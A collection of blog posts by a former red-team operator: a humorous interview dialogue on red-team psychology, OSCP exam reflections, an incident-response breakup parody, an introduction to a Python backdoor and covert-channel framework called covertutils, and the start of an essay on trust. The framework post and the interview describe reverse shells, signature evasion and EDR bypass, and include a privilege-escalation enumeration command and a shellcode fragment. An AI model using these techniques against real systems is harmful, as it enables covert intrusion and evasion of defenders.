Tag: security

Red Team Ops Psychology – an Act in 4 Parts

Disclaimers

  1. This Blog post is for fun. Do not self-diagnose!
  2. Do take it with a grain of salt.
  3. The technics mentioned here were relevant when I was a Red Team operator. Things might have changed by now!
  4. Non-technical people reading this (for any reason): skip the jargon, check the references! You could analyze any profession in a psychological tongue-in-cheek way too!

Setting: A Hypothetical Job Interview for the role of “Senior Red Teamer Operator”

Characters:

  • Interviewer
  • Interviewee (John)

Part 1 – The Addiction Part (kind of)

– So John, can you answer me this one question, what really happens when an implant is double-clicked in an assume-breach scenario?

– Of course! Can you hint me on what transport is the implant using to reach the C2 server? Is it DNS? HTTPS? anything more fancy?

– Let’s assume it’s HTTPS with Cert Pinning. Are you familiar with that?

– I sure am! So yeah, the implant when double-clicked starts a process in the host, it can be directly executing the malware code or plant it somewhere to be executed at a later time like COM hijacking on Windows. Eventually, maybe after self-decrypting its main components, the malicious code attempts to reach the C2 server. So, it most probably goes with DNS, resolving the C2 server’s IP address from a Domain Name embedded or calculated in its code. Then it starts a TLS handshake with the C2 server (or a reflector). The C2 Server provides a Server Hello TLS message attaching a x509 Certificate and the malware checks whether the Certificate matches with the “Pin”, a value which is embedded to the code and most of the time is a SHA2 hash. If all goes well, the rest of the TLS Handshake takes place and this is the point that the Red Team operator used to get a message like “Meterpreter session opened (session N)” but now they get something like “Host called home” or anything along these lines…

– That’s a brief but sufficient ans…

– I’m not done! This message is printed to the Red Team operator’s screen through some call which ends up to the drawing system of their GPU and the screen’s pixels change in a way to symbolize one of the phrases I just stated. The operator’s eyes then, perceive this change and the image goes directly to the Frontal Lobe of their brain for decoding. This is happening super fast! Keep in mind I’m skipping a lot of stuff here, like the retina’s decoding from light to electricomagnetic signals sent to the Optic Nerve and the flipped image trigonometry. I can explain these later if you wish, now…

– I think that’s way more than en…

– So yeah, the image is processed in the Visual Cortex of the brain, the words are, we could say, “parsed”, but I’m skipping some stuff here, and then are passed to Middle Temporal Gyrus (or MTG for short) of the Red Team operator’s brain that makes him realise what the phrases printed in the C2 server mean, and they mean that a shell just called home!

– John, we could skip to the next que…

– That’s actually the best part! Now that the operator realises that they got a shell, one thing happens before everything else related to Lateral Movement, checking if the host is Domain-joined and the rest. The operator’s neuroreceptors get a huge pinch of Dopamine in his midbrain, which effectively does two things: first sets the operator in a very good and motivated mood and second, with the help of Glutamate they take note on how exactly they got this shell, making them a better Red Team operator, hence making it more possible for them to feel that good again in the future. That might lead to a promotion leading to even more Dopamine! We could say, at this point, that the Red Team operator is a junky for shells! Isn’t it amazing?

– This was actually a very weird way to explain a connect-back! I have another question for you: How would you continue if you realized that the phishing campaign you sent didn’t go well?

Part 2 – The Conditioning Part

– Oh, what do you mean? Did we get any HTTP canary, did anyone even open the email? Did we get a shell and it was insta-killed?

– Let’s say you get no shells and none opened your emails. Radio silence kind of thing!

– Oh then, I’d check if the email pretext is good enough. It has to be urgent and formal just enough to push someone towards the wrong decision of clicking the malware. I could talk for hours on phychological violence of phishing campaigns and the general ethincs of the Red Teamer, anyway…

– Let’s assume that with the changed pretext the email gets opened but you’re not getting a shell?

– I’m really glad you are asking me this question! You know there was this guy called B.F Skinner, who has been the father of Behaviourism, the concept that we, as a species, are kind of animals that form our behaviour mainly through conditioning and our reward system! So this guy…

– John, could we please skip to the technical part now?

– Sure. So I’d get from the Information Gathering phase what kind of AV they’re currently using and try creating AV-bypasses for this specific AV by hand.

– And if you are getting a shell now but it dies on you in seconds?

– So, this Skinner guy made an experiment by putting rats and pigeons in a box. He used conditioning to make them learn to press a button in that box. They learned that by rewarding them with food every time they pushed that button. Really, not every time, and that’s exactly the catch! The animals got more conditioned to the button when he didn’t provide food in every button push, but just sometimes!

– John, can you please tell me why the shell dies? I find all these things really interesting but kind of irrelevant!

– The interview is for a Senior role, so I believed I had to explain full-stack. I’ll try to be more brief. My point is that the Red Team operator is getting kind of Skinnerbox’d, on learning how to land a working shell, by not getting it most of the time. And also, by waiting random amounts of time until they get the reward. So, if I had to fix that malware I’d finally need to write some code!

– Glad to hear that! What kind of code?

– C++ or C# most probably. The shells often die because of some Post Exploitation operation that is executed and is identified, traced and blocked by Endpoint Protection software on the host. So I’d need to get the same software in a Virtual Machine, run the same malware, do the same Post Exploitation actions and see where and how it gets killed. Then I’d try to either patch away the EDR’s DLLs from the process memory, as some of them work on userland, or change the order of the malware’s syscalls, as these are the ones that tend to be signature’d by EDRs.

– I see. Can you explain how you’d write the code.

– I guess I can! I’d run my IDE, most probably VSCode for these languages and do changes to the original malware. I’d use Git to keep all code changes tidy, maybe a branch per target, and then fail to compile a bunch of times. When the code compiles I’ll run the malware on the VM, do the actions and see if it gets killed. If it does I’d go back to square one, trying something else.

– That’s a bit generic but I get your idea.

– This continuing cycle of searching Windows API docs, coding, compiling, running and getting, or not getting a reward is the basis of it all. It is a Skinner box as well! I do something and I might get rewarded. This hooks me into trying it more and more, so I’ll eventually manage it! Monkeys could even author Shakespeare exactly this way!

– Your approach is really optimistic John. I like that. It all sounds so based, but in a really absurd way! So there is this question now: how would you get notified when you get a shell?

Part 3 – The Compulsive Part

– This brings me to this other topic! By now, having done so many things for this assessment, I’d totally be obsessed! It has to work, right? I mean, I wordsmith’d the pretext, modified the code, tested rigorously, launched the phishing campaign and all. So every minute I don’t get a connect-back must be painful by now!

– So, would you set up some Slack notification or something?

– There are plenty of ways! I can continously stare at my screen, waiting for the shell to come. But, as some persistence technics require reboot to work, we really have no clue how long it can take to get a shell, or if they’re going to work at all. So most C2s have notification systems, for Slack or Telegram messages on every new connect-back. I’d use one of those. I could also check the Payload Delivery server logs. I didn’t mention it, but we are totally keeping those! So, every some minutes I check my Slack or Telegram or the tail -f of the logs, as I might have missed something when I went to the freezer to get water, or when I went for a smoke.

– This is a lot of dedication! I like that!

– Probably you shouldn’t. Checking all the time is a part of the job that is not useful and is kind of addictive as well. Like checking socials or messages on your phone all the time. You could even say that is the compulsion part of an obsession. Because, Red Team operators more often than not get obsessed with landing in the target organization. It gets very personal. You could argue that it is passion, and sometimes it really is that, but I’d say it easily becomes an obsession. And compulsion follows obsession sooner or later! It can loosely be seen as an addiction too!

– Wait, you are saying that the Red Teamers have OCD?

– No! You can have Obsession-Compulsion cycles without having an OCD, just like you can have narcissistic traits without being a narcissist. The thing is that I believe these cycles make the professionals less effective, which is counter-intuitive, but I can explain.

– I don’t know if this an interview anymore.

– It really is a blog post, but let’s continue pretending for a moment – it’s gonna end soon!

– Ok, go ahead. If this way of working is ineffective, as you say, what is an effective one? To keep the interview format, what new ways would you bring to the Team in case you join?

Part 4 – The Cure for this Profession

– If I join the team I’d work in a very specific way. My way really comes from Buddh…

– I was really afraid we’d end up to something like this.

– It’s not a religious belief though. It is about not merging oneself with the outcome. Not valuing myself as a person from whether I managed to send a piercing phishing campaign or a well-baked payload. It might seem bad at first, but really relieves me from a lot of pressure I’d put on myself. Without this pressure and mental overhead I can really, calmly, hack them. My mind’s CPU can stop spending cycles on my self-worth and I use those cycles to better think of a good spear-phishing target or create a solid Malleable Profile.

– This is a very philosophical point of view Jo…

– Thank you, sir!

– I was saying that I appreciate it, but I’d like to ask if there is a more practical example of what value you could add to our team?

– Well, I speak Terraform fluently, as I like the preparation phase. For me, preparation is the best part of an assessment as the reward cycle hasn’t started yet and so the actions a Team takes are calm and measured. It is when the rewarding phase comes that Red Teamers lose their cool. They login from home, they do OpSec unsafe stuff, they run Powershell hoping to not get caught that one time. And that’s why they fail. These actions are reckless ways to get Dopamine. It’s their midbrain loosely overriding their Frontal Cortex that knows that Elastic SIEM has a bunch of rules that booby trap Powershell, and that DCSyncing from any Domain Admin user is easily detected.

– Thank you John for your time. We’ll send you an email later today on how we can proceed with the hiring process.

– Really? we just started… We are like 15 minutes in!

References

Addiction Neuroscience 101 – YouTube

The Neurobiology of Addiction Addiction 101 in Olson – YouTube

The Skinner Box – How Games Condition People to Play More – Extra Credits – YouTube

Thoughts on an “Obsessive Simulation of a Critical Procedure”

The Email

Some days ago I got a very weird email:

OSCP mail

I felt like something was very wrong. What with the “Professional” word in there (“Offensive Security Certified Professional“)? I don’t feel that professional. Specifically, this XKCD is so much expressing me:

lease

 

A professional?

So, as I’m not feeling that professional, this organization must be wrong to call me one. Yet, I actually pwned the machines required to “pass”, and be considered one. So, what am I?

Am I an OSCΗ (Offensive Security Certified Hobbyist)?

Being an OSCP means that you can do an Internal Penetration Test, and deliver some report. While the report requirements are too low (IMHO), the market is full of bad actual Penetration Test reports anyway, so it’s only fair. Yet, does this make you a Professional?

It (at least) makes you *Professional* on Capture The Flag

The infamous OSCP Lab and the Exam itself are basically CTFs. Nothing more. So, you don’t need to be a professional to play CTFs. I know 16-year-olds that play CTFs. And they think about batman half of the day. They could skill-wise earn an OSCP most probably.

But, then, skill is not the only thing needed to earn an OSCP. Far from it…

 

The ingredients of the OSCP recipe

The Exam

Well, to know computers is the easy part of the OSCP. In case you don’t know the well known process of OSCP exam, it goes as follows (as of 5/19):

  • You have 24 hours
  • You are presented with 5 hosts (Windows or Linux)
    • 25 point host – considered quite difficult
    • 25 point host with BoF – considered a gift from OffSec
    • 2 x 20 point boxes – difficult enough but doable
    • 1 x 10 point box – single remote exploit to root
  • You have to get root or Administrator/SYSTEM to 4 out of 5 boxes – 75/100 points to pass
  • The process is proctored
    • You are being watched and recorded for the whole 24-hour thing
    • Your screen is also watched and recorded
    • You have to write on a chat and get permission to take a break, even for a minute.
  • Metasploit and meterpreter can be used (successfully or not) only to one box.
  • When you finish, you get 24 more non-proctored hours to write a report and send it over to OffSec, with very specific/intimidating rules for packaging it.
  • If you have a report from 10 machines of the Lab and **all** the PDF exercises, you can submit them for 5 more points.

So, which part of this is something that makes you a Professional?

 

Mentality

For me, what made the whole exam a bearable experience that didn’t result in a mental breakdown, was handling it Professionally altogether. And by that, I mean bringing it to its logical proportions, evaluating what the exam actually means for me, my skills and my life in general.

Being a Professional on Penetration Testing some years now (without being OSCP), I’ve learned that there is a possibility that I won’t “hack” my way in some company. It happens. To even the best, and I don’t claim to be one of them. So there is some fat chance that I won’t get the enlightenment needed to get the Privilege Escalation for the 25 point box. Or find the exploit for the 10 point box (which was actually the case for me). And this is not a moment. This can be a 6-hour state of not finding this Privilege Escalation, that keeps you under the 75 passing points.

The ones that can patiently accept their not enlightened selves for 6 hours, falling back these 75 precious points, while calmly and constantly trying their best to earn them – these are Professionals.

 

Flawed Psychology Fucks People (FP2)

Given the situation of someone having 70 points (just under the passing line) for 6 hours (with the exam finishing in 2 hours) many bad things can cross one’s mind. It vastly depends on the background, but for me, problematic parenting (that happened long ago anyway), combined with bad school environment, some moderate impostor syndrome, a huge expectation from everyone I know that it’s a piece of cake for me (hence pressure), gave me plenty of triggers for bad thoughts.

Some of them:

  • I’m not enough / I’m not made for this (classic impostor syndrome verse)
  • If I had done the PDF exercises and Lab Report I could have the 5 points that I now miss (pointless regret)
  • “You can’t do it, it’s very difficult” (typical bad-fatherish voice)
  • I’m gonna fail and all my friends will realize that I’m not that good at hacking.
  • I had to study Windows/Linux Privilege Escalation more. It’s my fault. (another pointless regret).
  • If I fail this then I’m not a good hacker. And I haven’t invested to anything as much as hacking.

Continuing to look for the correct Privilege Escalation vector, while these thoughts knock your head’s door is not a simple task. It is not only about not opening to them. It is about minimizing them out of existence. About fortifying and allowing yourself to care only as much as needed and no more. Plus, all these thoughts count towards your thinking capacity, and you need all of it anyway.

What with the non-stop 24 hours?

There is no direction. It is 24 hours and a .ovpn file. Everything is up to you. You can sleep, eat, go out for beers, go pee every five minutes or get on an LSD trip. If somewhere in there you manage to get 4/5 root flags, and the next day you report it slightly better than a young monkey, you are an OSCP. That’s it. That’s the deal.

So it tests the maturity of your time managing skills. Do you get into rabbit-holes a lot? Do you stay in rabbit-holes out of stubborness of investing time to them? Do you have the tendency to procrastinate when you are looking up something on Github? Do you maybe check your phone every X minutes (X < 10)? These things are gonna cost. They cost in life anyway, but this 24-hour exam they are gonna cost X100.

 

“Try Harder”

Handling all the above while pwning 4/5 boxes in 24 hours is not easy. This is what makes you a Professional. This is OSCP.

The Trying Harder, the classic quote of OffSec is not about the boxes. Is about fixing the flaws that plague oneself, to refine the person as a whole. The challenge could very well be anything else. Yet, it’s not out of coincidence that the subject of a test that goes so deep into one’s psychology is an IT Security one. It has been well proven that IT Security and Human Psychology are well connected. I found somewhere a blog just about that. I think it was called securo-something

Between an Incident Response and a Break-up

Long time again… Sometimes I feel like I am gathering inspiration for too long, and it starts defusing after a while.

There is a perfect timing – a sweet spot – for writing a poem or a python package. If you miss it  that’s it, you missed it… You need to gather your inspiration all over again…

It’s been almost a year since my first post (Dating as a form of Penetration Testing). It is time for a break-up parallelization. Here we go!

 

Incident Response as a form of a Break-up

The Setup

Sometimes bad things happen. Those bad things vary in type, but a security incident in a company can be a very bad thing. A Bad like Jesse James thing. A company can lose thousands of $ or because of a spear-phishing campaign, or a compromised account on the database server.

A break-up, in the other hand is a more straightforward thing. You gotta get separated from someone or something beloved (I won’t forget the moment I gave up my ThinkPad, for my corporal machine).

For a guy the beloved thing is his girlfriend (or even his boyfriend), for a sys admin it’s the rootkit‘d File Server (he spend days and mojo building).

And you gotta get separated for sure… The Relationship/Server is no good anymore. It actually does more harm than good

Going Deeper

Technically speaking, there are several phases, both on an incident response, and on a break-up. And if you think of it hard enough, they seem to be the same phases…

SANS documents the Incident Response Phases in the GCIH cert material as follows:

  • Identification
  • Containment
  • Eradication (Cleaning Up)
  • Recovery
  • Lessons Learned

Hell, doesn’t this sound awfully familiar already?

So, let’s shine! Our star tonight: the Separated & Hacked SysAdmin

 

Identification

I don’t actually feel the same way I used to with her. I feel nothing when I touch her… I don’t care if I will be seeing her tonight or not

# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19356 648 ? Ss May20 0:02 /sbin/init
root 2 0.0 0.0 0 0 ? S May20 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S May20 0:03 [migration/0]
[...]
root 4108 0.0 0.0 11716 548 ? S May20 0:02 /usr/sbin/.httpd
apache 37008 0.0 0.0 213148 11328 ? S May21 0:04 /usr/sbin/httpd

It is this time! The shivers you get. The mindblow. The spine that tingles a bit. The urge to cry… The realization that you have no tears…

It happened on Monday. It had to be about 19:something. Stayed at work late and had to come at her place for the night. The moment he was typing the ps command (for no reason, like every Linux guy who is bored in front of the #), he was thinking of his girlfriend…

Stayed late just to have some time alone. Didn’t have work to do. Didn’t need to be at work at all. But, for some reason he couldn’t get his head around the forthcoming sleepover. It ‘d be the same thing again. The same meal, the same sex, the same “Calvin and Hobbes” comic in the WC… He wouldn’t do it.

Then he grasped the ps output. Couldn’t actually believe what he was staring at. At first he was like “Hey, my httpd ain’t running as root. I fixed the config two days ago“. And then he went: “what the fuck is this bro?” (he loves P.C. Principle from South Park).

After the shock he had two phone calls to make. More like three. The first one was to his girlfriend. Talked about the incident. He couldn’t come over… He was somewhat hopeful for this. Somewhat… Sometimes digital forensics are better than sex. But that night… That night anything was better than sex!

And then he called the Incident Response team, and his best friends. Ordered pizza from the office to his home (that makes it four phone calls). Arranged a meeting for tomorrow morning with the Incident Response guys and headed for home were his friends were also heading after the Bromance Alarm.

He had to figure out both issues the following day. How comes he can’t see her face in his mind?. How this rogue process was planted? He had to get his shit together…

 

Containment

SANS got me on this again! SANS explains the Containment Phase as “to stop the bleeding“. SANS guys must be really experienced with break-ups apart from sleuthkit.

So, the sys-admin guy broke-up the next morning. He was the smart type of guy – he didn’t depress his feelings. He felt like so and he broke-up!

Ironically, he did so over the phone, while the Incident Response guys were unplugging the Ethernet from his server (after gathering live memory dumps of course)…

The containment phase began the same evening. He gathered the gang again and went to a Pub. Got almost wasted with just beers and nachos. Then he introduced himself to a stranger, while his friends were constantly provoking him, like high-schoolers (do we –men– actually ever escape the high-school age?). Told everything to her, while constantly burping like Rick from Rick and Morty.

He knew nothing about what was going to happen next… He knew nothing about the Nightingale Syndrome that the woman was under. To make a long story short, after almost crying on her arms, they got pre-laid in the Pub’s WC and completely laid in her place…

She became his “rebound girl” for a while. He slept over in her house for almost a week. He went home to pick up things like toothbrush and clothes. Too many memories in there… It was time for…

 

Eradication

The Friday Night was a bummer. All day Friday in work he was trying to remove the malware from the compromised server. There were also, crontabs, services, even a kernel mod was found by the forensics team…

He kept removing shit and more shit kept spawning. Rogue binaries in /root/bin/ and bogus entries in lsmod output… All day Friday he was removing malware…

Then he got home. A Friday evening. His friends were all busy and he kind of missed his ex.

What follows is often seen in movies and teenager video-clips. He got his zippo and went to the bathroom with all the pictures he had from the previous holidays they did together. He set them on fire on the bathtub. Later he brought presents and all romance-shit card-postals and letters from the Erasmus era. Her old sunglasses, her toothbrush, 3 pairs of socks… He kept burning stuff all night and more kept spawning…

 

Recovery

He took days burning stuff and drinking Mountain Dew or Dr. Pepper. He also made a new friend – the pizzaboy. Gained some weight, stopped going out, lost the NBA finals. He was a mess for some time…

 

Then, suddenly one morning, he woke up motivated! Went for a walk before work by himself. Had some push-ups before putting his jeans on. It was time to finally recover…

Went to work and rebuilt the whole server. LDAP authentication, public key only authentication on SSH, remote sys-logging, etc.

Then he got home. Cooked a meal for himself, after a long time. Brewed some coffee. Checked out Hacker News from his Android, like he used to, even before he met his ex.

Later that day, he went to the Pub, alone. Got some beer and sat by the window, alone. Nothing happened. None talked to him and he talked to no one. He did some thinking, all by himself.

Before going to bed, ’round midnight, he remembered he loved Kerouac and Burroughs. Their books were on the shelf collecting dust for too long. It had been years since he last read his favorite books. Goddammit, what had happened to him…

Fell asleep while reading the Junky, feeling nostalgic. It was the first day for the rest of his life…

 

Lessons Learned

He went to work earlier that morning. Determined. Whatever fucked that server up wouldn’t happen again. At least wouldn’t without him noticing

Utilized syslog everywhere. Everywhere! Even to the coffee machine. Spent countless hours setting up Kibana, added a Suricata to the firewall appliance and FINALLY created VLANs!

The thing went personal. This was not just his company’s network, it was his personal fortress

 

He stayed up late at work, and when he got home, he got a beer and did some more thinking. Why did he abandon everything while being with his ex-girlfriend? Why did he give up all the music he used to like? His favorite books? His friends? His role as linux-guru sys-admin?

Felt a bit desperate on why he left everything for her. Couldn’t understand why he lost the best bits of himself just by being with her… He wouldn’t do that again.

The thing went personal. He was not just a body and soul looking forward to mate again, he was his personal fortress

 

 

 

Highly inspired by “\”How To Break Up\” Tales Of Mere Existence” and my life.

Thanks for reading my 12th article.

 

 

 

Reinventing the Wheel for the last time. The “covertutils” package.

 

The motivation

Those last months I came across several Github projects with RAT utilities, reverse shells, DNS shells, ICMP shells, anti-DLP mechanisms, covert channels and more. Researching code of other people gave me the ideas below:

Those things have to support at least an encryption scheme, some way of chunking and reassembling data, maybe compression, networking, error recovery. (To not mention working-hours operation-empire agent, certificate pinningmeterpreter and unit identification-pupyRAT).

And they all do! Their authors spent days trying to recreate the chunking for the AES Scheme, find a way to parse the Domain name from the exfiltrating DNS request, recalculate IP packet checksums and pack them back in place, etc…

And then it got me. A breeze of productivity. That crazy train of creation stopped just before my footnails. The door opened…

What about a framework that would handle all those by itself?

A framework that would be configurable enough to create everything from a TCP reverse shell, to a Pozzo & Lucky implementation.

A framework without even the most stable external dependencies, that uses only python build-ins

And all those without even thinking of encryption, message identification, channel password protections and that stuff we hate to code.

Then I started coding. Easter found me coding. Then Easter ended and I was still coding. Then I didn’t like my repo and deleted it altogether. I recreated it and did some more coding. Spent a day trying to support Python 3 and gave up after 10 hours of frustrated coding.

And finally it started working. The “covertutils” package was born. A proud python package! And here it is for your amusement:

https://github.com/operatorequals/covertutils

And here are the docs:

https://covertutils.readthedocs.io

Let’s get to it…

 

Basic Terminology of a backdoor

So let’s break down a common backdoor payload. In a backdoor we have mainly two sides. The one that is backdoored and the one that uses the backdoor.

The host that is backdoored typically runs a process that gives unauthorized access to something (typically OS shell). This process and the executable (binary or shellcode) that started it is the “Agent“.

The host that takes control of the backdoored machine typically does so using a program that interacts with the Agent in a specific way. This program is the “Handler” (from exploit/multi/handler anyone?)

Those two have to be completely compatible for the backdoor to work. Noticed how the Metasploit’s exploit/multi/handler asks for the payload that has been run to the remote host, just to know how to treat the incoming connection. Is it a reverse_tcp VNC? a stageless reverse_tcp_meterpreter?

Examining the similarities of those two (agents and handlers) helped me structure a python API, that is abstract, easy to learn, and configurable.

 

The covertutils API

All inner mechanics of the package end up in 2 major entities:

  • Handlers
    Which are abstract classes that model Backdoor Agent’s and Handler’s behavior (beaconing, silent execution, connect-back, etc).

    Attention passengers: The Handler classes are used to create both Agents and Handlers.

  • Orchestrators
    Which prepare the data that has to travel around. Encryption, chunking, steganography, are handled here.

With a proper combination of those two, a very-wide range of Backdoor Agents can be created. Everything from simple bind shells, to reverse HTTPS shells, and from ICMP shells to Pozzo & Lucky and other stego shells.

 

The data that is transferred is also modeled in three entities:

  • Messages
    Which are the exact things that an agent has to say to a handler and vice-versa.
  • Streams
    Arbitrary names, which are tags that inform the receiver for a specific meaning of the message. Think of them almost like meterpreter channels with the only difference that they are permanent.
  • Chunks
    Which are segmented data. They retain their Stream information though. When reassembled (using a Chunker instance) they return a (Stream, Message) tuple.

The Orchestrator

Orchestrators can be described as the “objects that decide about what is gonna fly through the channel“. They transform messages and streams to raw data chunks. Generally they operate like follows:

orchestrator.png

The chunks can then be decoded to the original message and stream by a compatible Orchestrator instance. They are designed to produce no duplicate output! Meaning that all bytes exported from this operation seem random to an observer (that hasn’t a compatible Orchestrator instance available). This feature is developed to avoid any kind of signature creation upon the created backdoors, when their data travel around networks…

The code that actually is needed for all this magic is the following:

>>> message = "find / -perm -4000 2>/dev/null"
>>> sorch = SimpleOrchestrator("Pa55w0rd!", streams = ['main'])
>>> chunks = sorch.readyMessage( message, 'main' )
>>> 
>>> for chunk in chunks :
...     print chunk.encode('hex')
... 
a3794050e26ad5935a1c
179083d79cad047be0a7
eb8bb3340b73ddc5eedb
af82b3a2a0f913a37a2f
3b0ddf0f365973dd4ae3
>>>

And to decode all this:

>>> sorch2 = SimpleOrchestrator("Pa55w0rd!", streams = ['main'], reverse = True)
>>> 
>>> for c in chunks :
...     stream, message = sorch2.depositChunk( c )
... 
>>> stream, message
('main', 'find / -perm -4000 2>/dev/null')
  • Note the reverse = True argument! It is used to create the compatible Orchestrator. Same objects are not compatible due to duplex OTP encryption channel.

 

The Handler

Handler‘s basic stuff is declared in an Abstract Base Class, called BaseHandler. There, 3 abstract functions are declared, to be implemented in every non-abstract subclass:

  • onMessage
  • onChunk
  • onNotRecognised

When data arrive to a Handler object, it uses the passed Orchestrator object (Handlers get initialized with an Orchestrator object) to try and translate it to a chunk. If it succeeds the onChunk(stream, message) method will be run. If the received data can’t be translated to a chunk then the onNotRecognised() will run.
Finally, and if the raw data is successfully translated, the Orchestrator will create the actual message when the last chunk of it is received. The onMessage(stream, message) method is run when a message is fully assembled.

The combined idea of a backdoor can be seen in the following image (fullscreen might be needed):

covertutilsbasicbackdoor.png

 

The Internals

How Streams are implemented

The Idea

Data needs to be tagged with a constant, for the handler to understand that it is meant to consume it. As a handler may receive data that is irrelevant, not sent from the agent, etc…

The problems in this idea are several. Bypassing them created the concept of the stream.

First of all, the constant has to be in a specific location in the data, for the handler to know where to search for it. That brings as to the second thing:

If a constant is located at a specific data offset, it defines a pattern. And a pattern can be identified. Then escalated to analysts. Then blacklisted. Then publicly reported and blocked by public anti-virus products.

So for the tagging idea to work well, we mustn’t use a constant. Yet the handler has to understand a pattern (that can’t be understood by analysts). Considering that both the Agent and Handler share a secret (for encryption), the solution is a Cycling Algorithm!

The StreamIdentifier Class

When sharing a secret, infinite secrets are shared. If the secret is pa55phra53 then we share SHA512(“pa55phra53“) too. And MD5(“pa55phra53“). And SHA512(SHA512(“pa55phra53“)). And MD5(SHA512(“pa55phra53“+”1”)). You get the idea.

So the StreamIdentifier uses this concept to create tags that are non-repetitive and non-guessable. It uses the shared secret as seed to generate a hash (the StandardCyclingAlgorithm is used by default, a homebrew, non-secure hasher) and returns the first few bytes as the tag.

When those bytes have to be recognized by a handler, the StreamIdentifier object of the handler will create the same hash, and do the comparison.

The catch is that when another data chunk has to be sent, the StreamIdentifier object will use the last created hash as seed to produce the new tag bytes. That makes the data-tag a variable value, as it is always produced from the previous tag used plus the secret.

A sequence of such tags is called a Stream.

Multiple Streams

Nothing stops the implementation from having multiple streams (in fact there is a probability pitfall, explained below…)! So instead of starting from “pa55phra53″ and generate a single sequence of, let’s say, 2 byte tags, we can start from “pa55phra531″, “pa55phra532”, “pa55phra533” … and create several such sequences (streams).

The StreamIdentifier will, not only identify that the data is consumable, but will also identify that a tag has been produced from “pa55phra531″, or “pa55phra533”. This can used to add context to the data. Say:

  • Everything produced from “pa55phra531 will be for Agent Operation Control (killswitch, mute, crypto rekeying, etc)
  • Everything produced from “pa55phra532 will be run on a OS shell
  • Everything produced from “pa55phra533 will be shellcode that has to be forked and run
  • Goes on and on…

Now the messages themselves do not need to follow a specific protocol, like:

shell:uname -a
asm:j
 X�Rh//shh/bin��̀
control:mute

they can be raw (saving bytes on the way), relying on the stream for delivering the context (when writing a RAT’y agent several features have to implemented, streams come in handy with this).

The streams are named with user-defined strings (e.g “shell”, “control”, etc) to help the developer.

 

The Pitfall

Tags have to be small. They shouldn’t eat to much of the bandwidth. They are like protocol headers in a way. Not too small to be guessable or randomly generated from a non-agent, not too big to be a small part of the raw data.

When implementing a tone of features using streams (say 8 features), using a 2-byte tag (it is the default) will create a small chance of collision. Specifically a 1/2341 chance (still more probable than finding a shiny pokemon in Pokemon Silver – 1/8192).
And to make things worse: this chance is not for the whole session, but per sent chunk (as tags are cycling for every chunk), so it is quite high!

The Solution

Well, maths got us down. For so many features, a new byte (3 byte tags) will minimize the chances tremendously. There is also an option to make the tags constant. This way the above chance counts for the whole session, making a collision quite hard.

 

Handler Types

At time of writing, there are several Handler Classes implemented. Each modelling a specific backdoor behavior.

  • BaseHandler
    This is the Base Class that exposes all abstract functions to the sub-class.
  • FunctionDictHandler
    Gets a (stream -> function) dict and for every message that arrives from stream x, the corresponding function is called with message as argument.
  • InterrogatingHandler
    This handler sends a constant message across to query for data. This is the way the classic reverse_http/s agents work. They periodically query the handler for commands, that are returned as responses. Couples with the ResponseOnlyHandler.
  • ResettableHandler
    This Handler accepts a constant value to reset all resettable components to initial state. The One Time Pad key, the stream seeds the chunker’s buffer, etc.
  • ResponseOnlyHandler
    This is the reverse of the InterrogatingHandler. It sits and waits for data. It sends data back only as responses to received data. Never Ad-Hoc.
  • StageableHandler
    This is a FunctionDictHandler that can be extended at runtime. It accepts serialized functions in special format from a dedicated stream, to add another tuple in the function-dict, extending functionality.

 

Orchestrators

The objects that handle the raw data to (stream, message) conversion are the Orchestrators.

They have some basic functionality of chunking, compression, stream tagging and encryption. They provide 2 methods, the readyMessage(message, stream) and the depositChunk(raw_data). The first one returns a list of data that are ready to be sent across (tagged, encrypted, etc), and the second one makes the Orchestrator try to consume data received and returns the (stream, message) tuple.

 

End of Part 1

The whole package includes several features that are not even mentioned in this article (Steganography, Data ManglingStegoInjector and DataTransformer classes-, etc), that while implemented, aren’t properly documented yet, so their internals may change.

They will be the subject of another post, along with a Pozzo & Lucky implementation using only coverutils and Raw Sockets.

 

I the mean time, there are some Example Programs for you to play around!

Feedback is always appreciated…

 

Trust: a tale of Security, Philosophy, Reverse Engineering and Python

The role of Trust on InfoSec Incidents

Security boils down to be entirely about trust, if you come to think of it. Every information security incident could somehow be rephrased to include the word “Trust” in its reasons of happening. Just try anything:

  • SQL Injections all over the Web (and injection family exploits): “Mistrusted user input”.
  • Cross-Site Scripting: Mistrusting that a site will run on your browser only non-malicious code.
  • Superfish Incident: Add of an untrusted SSL Certificate in the Trust List of all computers from Lenovo.
  • Stuxnet:
    • Enough trust to a USB removable medium for it to be plugged in an “Air-gapped” computer.
    • Trust of the engineers on what they see (the backdoored health monitoring indication of the centrifuges) rather than what they hear (the centrifuges screaming as they were over-spinning).
  • Heartbleed, Shellshock: Trust on Open Source code auditing (as those were glaring bugs – and not the only ones)
  • Snowden’s leaks (it is a Security Incident for the 3-letter guys): Too much Trust on an employee (even a high positioned one).
  • … add your favorite Incident here …

And I mean all Security, Crypto included…

Encryption algorithms are trusted to be working. I mean there are Proofs on that they work (work means that decryption undoes encryption) but there aren’t proofs on that there can be no ways to deduce easily the key (easily meaning “easier than brute force”). There are also “Backdoored Ciphers” (with DES flirting closely with this speculation). Do we Trust these? Of, course not! Did we trust them before speculating or prooving they were backdoored? Sure, I mean, why not (DES was the fuckin’ Encryption Standard, as its name implies).

In the same manner: Today we trust AES. Ιf tomorrow we find out that there is a way to (instantly) decrypt every AES communication, we won’t trust it anymore. Meanwhile someone is reading us… And we have ourselves another trust-based security incident.

 

Why Trust anyway?

As  Ernst Alexander Rauter put it, in his famous “Creating subject people – How an opinion forms in the mind” (a book that isn’t sold on amazon in english – german edition),: “Trust is something that always upflows, from low power people to higher power people“. This is a very rough translation of the fact that people tend to trust things they don’t manipulate. Also people never want to feel scammed, so in defense of the exploration of an unwanted truth they prefer to just “trust“.

That’s why we trust crypto, and we trust our Operating System or our car. Because we can’t be 100% sure about their actions. So we politely assume that everything works as intended. Just to be gentle with ourselves.

 

The Trust Game in Computers

One of UNIX’s fathers, Ken Thompson, (apart from being the reason you see a.out files when compiling without arguments), implied a groundbreaking question in 1984 (a really controversial date!): “Do you trust your compiler? Do you trust your compiler so much that you are sure that when you compile the /bin/login binary, it won’t plant a backdoor in it?“. I am talking about the well-known “Ken Thompson Hack” documented in his awesome paper “Reflections on Trusting Trust“.

The truth is we trust our default gcc installation, and –seriously– never questioned it. It seems far-fetched to believe that there is such possibility. The reason for that is because we have to be reverse engineers to actually Check It. And this isn’t the case for the most of us…

 

 

Asking for and gaining Trust

My case study subject

